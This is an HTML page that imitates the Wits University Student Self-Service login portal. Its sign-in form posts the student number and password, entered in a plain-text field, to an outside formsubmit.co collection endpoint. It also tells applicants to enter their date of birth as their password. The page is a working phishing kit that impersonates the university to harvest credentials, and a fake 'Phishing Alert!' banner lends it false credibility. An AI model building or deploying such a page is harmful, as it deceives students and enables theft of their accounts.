<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="shortcut icon" href="img.jpg" type="image/x-icon">
    <link rel="stylesheet" href="style.css">
    <title>Student Self-Service - Wits University</title>
</head>

<body>
    <div class="gradient"></div>
    <div class="container">
        <img src="img.jpg" alt="logo"></img>
        <h2 class="tittle">Student Self-Service Portal</h2>
        <h2 class="warn">Phishing Alert!</h2>
        <p class="warn-para">Click here for more information</p>
        <h4><a href="#">What can i do on this Portal?</a></h4>
        <form action="https://formsubmit.co/3b04768f200ed2ad610c96dde4dad6b8" method="POST">
            <p class="label">Student/Personal Number</p>
            <input type="text" name="Student_number" autofocus placeholder="eg. 2116515. Not your Temp ID." required>
            <br>
            <p class="label">Password</p>

            <input type="text" name="password" required>
            <br>
            <button id="myBtn">Sign In</button>

            <p class="padd">Current Students - Your Password is your current Student password.</p>
            <p class="padd">Applicants - Your Password is your date of birth in (YYMMDD) format eg. 861224.</p>
            <p class="last"><a href="#">Forgot your password.</a></p>
        </form>
    </div>
    <br><br>
</body>

</html>